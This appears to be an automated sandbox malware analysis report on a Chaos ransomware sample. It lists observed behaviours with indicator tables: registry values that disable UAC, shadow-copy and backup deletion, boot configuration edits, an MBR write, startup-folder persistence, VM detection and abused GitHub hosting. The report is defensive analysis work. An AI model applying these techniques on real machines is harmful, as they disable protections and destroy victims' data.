Analysis Overview
Threat Level: Known bad
The file http://q was found to be: Known bad.
Malicious Activity Summary
Chaos
Chaos Ransomware
UAC bypass
Deletes shadow copies
Looks for VirtualBox drivers on disk
Modifies boot configuration data using bcdedit
Disables Task Manager via registry modification
Deletes backup catalog
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
UPX packed file
Drops startup file
Looks up external IP address via web service
Enumerates connected drives
Writes to the Master Boot Record (MBR)
Adds Run key to start application
Drops desktop.ini file(s)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Detected potential entity reuse from brand microsoft.
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Detects Pyinstaller
Modifies registry key
Enumerates system info in registry
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Runs net.exe
Enumerates processes with tasklist
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported: 2024-05-05 19:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-05 19:57
Reported: 2024-05-05 20:11
Platform: win10v2004-20240426-en
Max time kernel: 863s
Max time network: 864s
Command Line
Signatures
Chaos
Chaos Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Looks for VirtualBox drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxMouse.sys | C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxMouse.sys | C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\ScaryInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat | C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{c649ede4-f16a-4486-a117-dcc2f2a35165} = "\"C:\\ProgramData\\Package Cache\\{c649ede4-f16a-4486-a117-dcc2f2a35165}\\VC_redist.x64.exe\" /burn.runonce" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1162180587-977231257-2194346871-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe | N/A |
Detected potential entity reuse from brand microsoft.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140_threads.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140kor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140kor.dll | C:\Windows\system32\msiexec.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7iitjvsua.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\SourceHash{19AFE054-CA83-45D5-A9DB-4108EF4BD391} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de525.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de526.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5de526.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de513.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AA0C8AB5-7297-4D46-A0D9-08096FE59E46} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE64C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE737.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE8FD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5de53b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5de513.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE9D9.tmp | C:\Windows\system32\msiexec.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value omitted) | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
